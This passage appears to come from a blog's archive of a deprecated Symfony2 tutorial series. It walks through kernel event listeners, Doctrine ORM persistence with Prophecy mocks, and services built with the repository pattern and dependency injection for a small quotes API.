│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ ├── doctrine
│ │ │ └── Quote.orm.yml
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll learn how to extend the framework using events.
The Event Dispatcher is another standalone component which can be summed up as follows:
<?php
class EventDispatcher
{
private $events = array();
public function addListener($event, $listener)
{
$this->events[$event][] = $listener;
}
public function dispatch($event)
{
foreach ($this->events[$event] as $listener) {
$listener();
}
}
}
You can register listeners (which are callables) and then call them by dispatching the subscribed event:
$dispatcher = new EventDispatcher();
$dispatcher->addListener('before.boyard', function () { echo 'Ultimate Challenge'; });
$dispatcher->dispatch('before.boyard'); // Prints "Ultimate Challenge".
Here's the actual API:
<?php
namespace Symfony\Component\EventDispatcher;
interface EventDispatcherInterface
{
public function dispatch($eventName, Event $event = null);
public function addListener($eventName, $listener, $priority = 0);
public function removeListener($eventName, $listener);
public function getListeners($eventName = null);
public function hasListeners($eventName = null);
public function addSubscriber(EventSubscriberInterface $subscriber);
public function removeSubscriber(EventSubscriberInterface $subscriber);
}
The Component handles priorities, and contrary to our previous example it needs
an Event object when dispatching events, allowing us to provide a context.
Subscribers are listeners which have a getSubscribedEvents method.
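As an illustration, a subscriber could look like this sketch (ExampleSubscriber is a hypothetical name; the interface and the KernelEvents constant are the real Symfony2 ones):

```php
<?php

namespace Fortune\ApplicationBundle\EventListener;

use Symfony\Component\EventDispatcher\EventSubscriberInterface;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
use Symfony\Component\HttpKernel\KernelEvents;

class ExampleSubscriber implements EventSubscriberInterface
{
    // Contrary to a plain listener, the subscriber itself declares
    // which events it listens to (with an optional priority).
    public static function getSubscribedEvents()
    {
        return array(
            KernelEvents::REQUEST => array('onKernelRequest', 0),
        );
    }

    public function onKernelRequest(GetResponseEvent $event)
    {
        // React to the kernel.request event here.
    }
}
```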
Note: If you want to learn more about this component, have a look at Raul Fraile's article.
The Symfony2 HttpKernel Component dispatches events to provide extension points, we can:
Note: exceptions are caught by default, but this can be disabled.
Here's the full list of kernel events.
Note: If you want to learn more about those events, have a look at Matthias Noback's book: A year with Symfony.
The FrameworkBundle takes care of registering the listeners using the Dependency Injection Container (DIC): we declare our listener as a service in the configuration, with a specific tag.
Note: the DIC can retrieve all the services with the given tag using
findTaggedServiceIds, making it easier to register listeners for example
(this is done in Symfony\Component\EventDispatcher\DependencyInjection\RegisterListenersPass
which is called in the FrameworkBundle).
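A rough sketch of what such a compiler pass does (ExamplePass is hypothetical; the real RegisterListenersPass is more elaborate, but the findTaggedServiceIds call is the key part):

```php
<?php

use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;

class ExamplePass implements CompilerPassInterface
{
    public function process(ContainerBuilder $container)
    {
        $dispatcherDefinition = $container->getDefinition('event_dispatcher');

        // findTaggedServiceIds returns an array mapping each tagged
        // service id to the attributes of each of its tags.
        foreach ($container->findTaggedServiceIds('kernel.event_listener') as $id => $tags) {
            foreach ($tags as $attributes) {
                $dispatcherDefinition->addMethodCall('addListenerService', array(
                    $attributes['event'],
                    array($id, $attributes['method']),
                ));
            }
        }
    }
}
```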
In QuoteController::submitAction, we need to get the request's content and
convert it from JSON. This is a generic task which should be executed before
every controller: we can move it in an event listener.
First create the directory:
mkdir src/Fortune/ApplicationBundle/EventListener
Then we create the actual listener:
<?php
// File: src/Fortune/ApplicationBundle/EventListener/SubmitJsonListener.php
namespace Fortune\ApplicationBundle\EventListener;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class SubmitJsonListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$content = $request->getContent();
$data = json_decode($content, true);
$request->request->add($data ?: array());
}
}
Next we register it in the Dependency Injection Container:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
factory-service="doctrine"
factory-method="getRepository">
<argument>FortuneApplicationBundle:Quote</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
<service id="fortune_application.submit_json_listener"
class="Fortune\ApplicationBundle\EventListener\SubmitJsonListener"
>
<tag name="kernel.event_listener" event="kernel.request" method="onKernelRequest" />
</service>
</services>
</container>
And finally we update the controller:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedValues = $request->request->all();
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
We can now run the tests:
./vendor/bin/phpunit -c app
No regression detected! We can commit our work:
git add -A
git ci -m 'Used event'
Note: The FOSRestBundle provides such an event listener. We're only creating it manually here to learn about events.
If someone submits a malformed JSON, our listener can stop the execution and return a proper response:
<?php
// File: src/Fortune/ApplicationBundle/EventListener/SubmitJsonListener.php
namespace Fortune\ApplicationBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class SubmitJsonListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$content = $request->getContent();
$data = json_decode($content, true);
if (JSON_ERROR_NONE !== json_last_error()) {
$data = array('message' => 'Invalid or malformed JSON');
$response = new JsonResponse($data, Response::HTTP_BAD_REQUEST);
$event->setResponse($response);
$event->stopPropagation();
}
$request->request->add($data ?: array());
}
}
By setting a response in the event, the HttpKernel will almost stop (it
dispatches a kernel.response event and an extra kernel.finish_request event)
and return it.
By using stopPropagation, we prevent further kernel.request listeners from
being executed.
Have a look at HttpKernel::handleRaw to discover what's going on.
Let's run the tests one last time:
./vendor/bin/phpunit -c app
All green, we can commit our work:
git add -A
git ci -m 'Handled errors'
Events are a powerful way to extend the framework: you create a listener, register it on a specific event and you're done.
Kernel events aren't the only ones available: Doctrine provides its own (it uses its own event dispatcher library), the Symfony2 Form Component uses them, and we could even create our own events!
The only drawback is that they're sort of hidden: by looking at the controller's code we cannot know that submitted JSON has been handled, we lose explicitness.
The next article will be about annotations.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on mastering the Symfony2 framework. Have a look at the first three:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one, we'll add real database persistence using the Doctrine ORM, a third party bundle, the command line console and a mocking library.
Note: Symfony2 isn't coupled to any ORM or database library. We could use anything else like PDO, Propel ORM, POMM, or anything you want!
Just like Symfony, Doctrine is composed of many libraries which can be used separately. The two main ones are the DBAL (DataBase Abstraction Layer) and the ORM (Object Relational Mapper).
DoctrineBundle registers the library's services into our Dependency Injection Container. It can be installed quickly:
composer require 'doctrine/doctrine-bundle:~1.2'
The bundle doesn't force you to use the ORM (you can simply use the DBAL), so we need to explicitly install it:
composer require 'doctrine/orm:~2.2,>=2.2.3'
The bundle has to be registered in our application:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Its services depend on some configuration parameters, which we will add:
# File: app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: doctrine.yml }
framework:
secret: %secret%
router:
resource: %kernel.root_dir%/config/routing.yml
Next we create the actual configuration:
# File: app/config/doctrine.yml
doctrine:
dbal:
driver: pdo_mysql
host: 127.0.0.1
port: ~
dbname: %database_name%
user: %database_user%
password: %database_password%
charset: UTF8
orm:
auto_generate_proxy_classes: %kernel.debug%
auto_mapping: true
Note: the ~ value is equivalent to null in PHP.
The values surrounded by % will be replaced by parameters coming from the DIC.
For example, kernel.debug is set by the FrameworkBundle. We'll set the values
of the database ones in the following file:
# File: app/config/parameters.yml
parameters:
secret: hazuZRqYGdRrL8ATdB8kAqBZ
database_name: fortune
database_user: root
database_password: ~
For security reasons, this file is not committed. You can update the distributed file though, so your team will know that they need to set a value:
# File: app/config/parameters.yml.dist
parameters:
secret: ChangeMePlease
database_name: fortune
database_user: root
database_password: ~
The first thing we need is to define the schema (tables with their fields), so we'll create this directory:
mkdir src/Fortune/ApplicationBundle/Resources/config/doctrine
And then the configuration file for the Quote entity:
# src/Fortune/ApplicationBundle/Resources/config/doctrine/Quote.orm.yml
Fortune\ApplicationBundle\Entity\Quote:
type: entity
repositoryClass: Fortune\ApplicationBundle\Entity\QuoteGateway
table: quote
id:
id:
type: integer
generator:
strategy: AUTO
fields:
content:
type: text
createdAt:
type: datetime
column: created_at
Note: Doctrine uses the word "Repository" with a different meaning than the Repository design pattern (the one with gateway and factory). In our case it corresponds to the gateway.
As you can see, we've added a createdAt attribute to our entity. Let's update
its code:
<?php
// File: src/Fortune/ApplicationBundle/Entity/Quote.php
namespace Fortune\ApplicationBundle\Entity;
class Quote
{
private $id;
private $content;
private $createdAt;
public function __construct($id, $content)
{
$this->id = $id;
$this->content = $content;
$this->createdAt = new \DateTime();
}
public static function fromContent($content)
{
return new Quote(null, $content);
}
public function getId()
{
return $this->id;
}
public function getContent()
{
return $this->content;
}
public function getCreatedAt()
{
return $this->createdAt;
}
}
Note: We've added a named constructor which will prove useful with the gateway.
Symfony2 provides a powerful Console Component allowing you to create command line utilities. It can be used standalone, or in the full stack framework thanks to the FrameworkBundle. To create the console, we just need to create the following file:
#!/usr/bin/env php
<?php
// File: app/console
set_time_limit(0);
require_once __DIR__.'/../vendor/autoload.php';
require_once __DIR__.'/AppKernel.php';
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArgvInput;
$input = new ArgvInput();
$kernel = new AppKernel('dev', true);
$application = new Application($kernel);
$application->run($input);
The object ArgvInput contains the input given by the user (command name,
arguments and options). Bundles can register commands in the application by
fetching them from their Command directory.
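For example, a bundle could expose a command by dropping a class like this sketch in its Command directory (HelloCommand and the fortune:hello name are hypothetical):

```php
<?php

// File: src/Fortune/ApplicationBundle/Command/HelloCommand.php (hypothetical)

namespace Fortune\ApplicationBundle\Command;

use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;

class HelloCommand extends Command
{
    // Declares the command's name and description, as shown by
    // `php app/console list`.
    protected function configure()
    {
        $this
            ->setName('fortune:hello')
            ->setDescription('A hypothetical example command');
    }

    // Called when running `php app/console fortune:hello`.
    protected function execute(InputInterface $input, OutputInterface $output)
    {
        $output->writeln('Hello from the console!');
    }
}
```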
We can now create the database and schema easily:
php app/console doctrine:database:create
php app/console doctrine:schema:create
Note: Those are useful when developing the application, but shouldn't be used in production.
Note: If you want to learn more about the Symfony2 Console Component, you can read this article.
Until now, our QuoteGateway was saving and retrieving the quotes from a file.
We'll update it to be a Doctrine Repository:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteGateway.php
namespace Fortune\ApplicationBundle\Entity;
use Doctrine\ORM\EntityRepository;
class QuoteGateway extends EntityRepository
{
public function insert($content)
{
$entityManager = $this->getEntityManager();
$quote = Quote::fromContent($content);
$entityManager->persist($quote);
$entityManager->flush();
return $quote;
}
}
The EntityManager object does the actual persistence and will set the quote's
ID. The EntityRepository already has a findAll method, so we can remove it.
The last thing we need is to update the DIC's configuration:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
factory-service="doctrine"
factory-method="getRepository">
<argument>FortuneApplicationBundle:Quote</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
</services>
</container>
The doctrine service manages the Doctrine Repositories. To manually get a
repository you'd need to do something like
$container->get('doctrine')->getRepository('FortuneApplicationBundle:Quote');
the factory-service and factory-method attributes allow us to simply call
$container->get('fortune_application.quote_gateway').
Database operations can be slow, but we want our tests to run as fast as possible: this is a good opportunity to use a test double.
PHPUnit comes with its own mocking library, but we'll use a less verbose and more expressive one: Prophecy. First we install the PHPUnit integration of Prophecy:
composer require --dev 'phpspec/prophecy-phpunit:~1.0'
Then we update our test:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Entity/QuoteRepositoryTest.php
namespace Fortune\ApplicationBundle\Tests\Entity;
use Fortune\ApplicationBundle\Entity\Quote;
use Fortune\ApplicationBundle\Entity\QuoteFactory;
use Fortune\ApplicationBundle\Entity\QuoteGateway;
use Fortune\ApplicationBundle\Entity\QuoteRepository;
use Prophecy\PhpUnit\ProphecyTestCase;
class QuoteRepositoryTest extends ProphecyTestCase
{
const ID = 42;
const CONTENT = '<KnightOfNi> Ni!';
private $gateway;
private $repository;
public function setUp()
{
parent::setUp();
$gatewayClassname = 'Fortune\ApplicationBundle\Entity\QuoteGateway';
$this->gateway = $this->prophesize($gatewayClassname);
$factory = new QuoteFactory();
$this->repository = new QuoteRepository($this->gateway->reveal(), $factory);
}
public function testItPersistsTheQuote()
{
$quote = new Quote(self::ID, self::CONTENT);
$this->gateway->insert(self::CONTENT)->willReturn($quote);
$this->repository->insert(self::CONTENT);
$this->gateway->findAll()->willReturn(array($quote));
$quotes = $this->repository->findAll();
$foundQuote = $quotes['quotes'][self::ID];
$this->assertSame(self::CONTENT, $foundQuote['content']);
}
}
We created a mock of QuoteGateway which returns a quote we created beforehand.
Our changes are finished, let's run the tests:
./vendor/bin/phpunit -c app
No regression detected! We can commit our work:
git add -A
git commit -m 'Added doctrine'
Doctrine allows us to persist data; its bundle integrates smoothly into our application and provides us with handy command line tools.
You can have a look at Doctrine Migrations, a standalone library allowing you to deploy database changes; it even has a bundle.
In the next article, we'll talk about how to extend the framework using events.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on mastering the Symfony2 framework. Have a look at the first two:
In the previous articles we created an API allowing us to submit new quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── FortuneApplicationBundle.php
│ └── Tests
│ └── Controller
│ └── QuoteControllerTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll list the existing quotes and learn about entities, services, the repository design pattern and dependency injection.
By the time we finished implementing the first User Story, Nostradamus (our customer and product owner) had written the second one:
As a User
I want to be able to read the available quotes
In order to find interesting ones
Currently we don't persist our quotes, but now we will need to. However I'd like to dedicate a separate article to database persistence, so we will save our quotes in a file and concentrate on services.
Until now we wrote our code in the controller, and that was fine as there wasn't much of it. But our application is going to grow, so we need to put the code elsewhere: in services.
Basically, a service is just a class which does one thing (and does it well). Services are stateless: calling a method twice with the same parameters should always return the same result.
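As a minimal illustration (the class below is hypothetical, not part of the Fortune application), a stateless service keeps no mutable state, so the same input always yields the same output:

```php
<?php
// Hypothetical stateless service: it holds no mutable state, so calling
// format() twice with the same input always returns the same result.
class QuoteFormatter
{
    public function format($content)
    {
        return trim($content);
    }
}

$formatter = new QuoteFormatter();
echo $formatter->format("  Ni!\n"); // Ni!
```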
Services manipulate entities, which are classes representing the data; entities
don't have any behavior of their own. Let's create the Entity directory:
mkdir src/Fortune/ApplicationBundle/Entity
And now we'll write the Quote entity:
<?php
// File: src/Fortune/ApplicationBundle/Entity/Quote.php
namespace Fortune\ApplicationBundle\Entity;
class Quote
{
private $id;
private $content;
public function __construct($id, $content)
{
$this->id = $id;
$this->content = $content;
}
public function getId()
{
return $this->id;
}
public function getContent()
{
return $this->content;
}
}
There's no need to write a unit test for it: it doesn't contain any logic. The tests of its services (which manipulate it) will be enough.
We'll create a persistence service which follows the Repository design pattern: the repository calls a gateway to retrieve some raw data and transforms it using a factory.
Before creating it, we will write a unit test which will help us to specify how it should work. Here's its directory:
mkdir src/Fortune/ApplicationBundle/Tests/Entity
And its code:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Entity/QuoteRepositoryTest.php
namespace Fortune\ApplicationBundle\Tests\Entity;
use Fortune\ApplicationBundle\Entity\QuoteFactory;
use Fortune\ApplicationBundle\Entity\QuoteGateway;
use Fortune\ApplicationBundle\Entity\QuoteRepository;
class QuoteRepositoryTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = '<KnightOfNi> Ni!';
private $repository;
public function setUp()
{
$filename = '/tmp/fortune_database_test.txt';
$gateway = new QuoteGateway($filename);
$factory = new QuoteFactory();
$this->repository = new QuoteRepository($gateway, $factory);
}
public function testItPersistsTheQuote()
{
$quote = $this->repository->insert(self::CONTENT);
$id = $quote['quote']['id'];
$quotes = $this->repository->findAll();
$foundQuote = $quotes['quotes'][$id];
$this->assertSame(self::CONTENT, $foundQuote['content']);
}
}
Now we can create the class which should make the test pass:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteRepository.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteRepository
{
private $gateway;
private $factory;
public function __construct(QuoteGateway $gateway, QuoteFactory $factory)
{
$this->gateway = $gateway;
$this->factory = $factory;
}
public function insert($content)
{
$quote = $this->gateway->insert($content);
return $this->factory->makeOne($quote);
}
public function findAll()
{
$quotes = $this->gateway->findAll();
return $this->factory->makeAll($quotes);
}
}
See what we've done in the constructor? That's dependency injection (passing arguments on which the class relies).
Note: for more information about Dependency Injection, you can read this article.
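To make the idea concrete, here is a minimal sketch (with hypothetical class names, not taken from the application): the class receives its collaborator as a constructor argument instead of creating it itself, which makes it easy to swap that collaborator for a test double.

```php
<?php
// Hypothetical example: Newsletter doesn't create its Mailer itself,
// it receives one through the constructor (dependency injection).
class Mailer
{
    public function send($message)
    {
        return 'sent: '.$message;
    }
}

class Newsletter
{
    private $mailer;

    // The dependency is passed in, not instantiated here.
    public function __construct(Mailer $mailer)
    {
        $this->mailer = $mailer;
    }

    public function publish($content)
    {
        return $this->mailer->send($content);
    }
}

$newsletter = new Newsletter(new Mailer());
echo $newsletter->publish('Ni!'); // sent: Ni!
```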
The gateway is the class where the actual persistence is done:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteGateway.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteGateway
{
private $filename;
public function __construct($filename)
{
$this->filename = $filename;
}
public function insert($content)
{
$content = trim($content);
$line = $content."\n";
file_put_contents($this->filename, $line, FILE_APPEND);
$lines = file($this->filename);
$lineNumber = count($lines) - 1;
return new Quote($lineNumber, $content);
}
public function findAll()
{
$quotes = array();
$contents = file($this->filename);
foreach ($contents as $id => $content) {
$quotes[$id] = new Quote($id, trim($content));
}
return $quotes;
}
}
Wait a minute, we didn't write any test for this class! Well, that's because
QuoteRepositoryTest already covers it.
The factory converts the object returned by the gateway into something usable by the controller (a JSON-serializable array):
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteFactory.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteFactory
{
public function makeOne(Quote $rawQuote)
{
return array('quote' => $this->make($rawQuote));
}
public function makeAll(array $rawQuotes)
{
$quotes = array('quotes' => array());
foreach ($rawQuotes as $rawQuote) {
$quotes['quotes'][$rawQuote->getId()] = $this->make($rawQuote);
}
return $quotes;
}
private function make(Quote $rawQuote)
{
return array(
'id' => $rawQuote->getId(),
'content' => $rawQuote->getContent(),
);
}
}
No unit test for this factory: the one for the repository already covers it. Now that the code is written, we can check that the tests pass:
./vendor/bin/phpunit -c app
The controller's responsibility is to retrieve the parameters from the request,
pass them to a service and then use its return value to create a response.
We won't construct the QuoteRepository service directly in the controller:
Symfony2 comes with a Dependency Injection Container (DIC).
In a nutshell, when you ask the container for a service, it constructs it for
you.
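The container itself is just an object that knows how to build other objects on demand. As a rough sketch (this is an illustration of the idea, not Symfony's actual implementation):

```php
<?php
// Toy container: each service id is mapped to a factory closure; the
// first get() builds the service, later calls return the same instance.
class SimpleContainer
{
    private $definitions = array();
    private $services = array();

    public function register($id, \Closure $factory)
    {
        $this->definitions[$id] = $factory;
    }

    public function get($id)
    {
        if (!isset($this->services[$id])) {
            $factory = $this->definitions[$id];
            // The container passes itself so factories can fetch dependencies.
            $this->services[$id] = $factory($this);
        }

        return $this->services[$id];
    }
}

$container = new SimpleContainer();
$container->register('quote_factory', function () {
    return new \stdClass();
});

// The same instance is returned on every call:
var_dump($container->get('quote_factory') === $container->get('quote_factory')); // bool(true)
```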
The first thing we need is to prepare the bundle by creating the following directories:
mkdir src/Fortune/ApplicationBundle/DependencyInjection
mkdir -p src/Fortune/ApplicationBundle/Resources/config
Then we need to create a class which will load the bundle's services into the DIC:
<?php
// File: src/Fortune/ApplicationBundle/DependencyInjection/FortuneApplicationExtension.php
namespace Fortune\ApplicationBundle\DependencyInjection;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
class FortuneApplicationExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__.'/../Resources/config');
$loader = new XmlFileLoader($container, $fileLocator);
$loader->load('services.xml');
}
}
As you can see, we told the extension to look for a configuration file. Here it is:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
>
<argument>/tmp/fortune_database.txt</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
</services>
</container>
Now QuoteRepository is available in the controller:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
}
We can now make sure that everything is fine by running the tests:
./vendor/bin/phpunit -c app
Note: for more information about Symfony2 Dependency Injection Component you can read this article.
It's now time to fulfill the second user story, starting with a functional test:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
private function get($uri)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$client = static::createClient();
$client->request('GET', $uri, array(), array(), $headers);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
public function testSubmitEmptyQuote()
{
$response = $this->post('/api/quotes', array('content' => ''));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testSubmitNoQuote()
{
$response = $this->post('/api/quotes', array());
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testListingAllQuotes()
{
$response = $this->get('/api/quotes');
$this->assertSame(Response::HTTP_OK, $response->getStatusCode());
}
}
The next step is to update the configuration:
# File: app/config/routing.yml
submit_quote:
path: /api/quotes
methods:
- POST
defaults:
_controller: FortuneApplicationBundle:Quote:submit
list_quotes:
path: /api/quotes
methods:
- GET
defaults:
_controller: FortuneApplicationBundle:Quote:list
Then we write the action:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
And finally we run the tests:
./vendor/bin/phpunit -c app
Everything is fine, we can commit:
git add -A
git commit -m 'Added listing of quotes'
Services are where the logic should be; they manipulate entities, which carry the data. We used the repository design pattern, which is very handy for APIs: the repository calls a gateway which retrieves raw data and then converts it using a factory, so the controller only needs to communicate with the repository. Finally, we saw that "Dependency Injection" is just a fancy term for "passing arguments".
In the next article, we'll learn how to persist data in a database, using the Doctrine2 ORM.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on mastering the Symfony2 framework. Have a look at the first one: Bootstrapping.
In the first article we bootstrapped our project with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ └── FortuneApplicationBundle.php
└── web
└── app.php
Here's the repository where you can find the actual code.
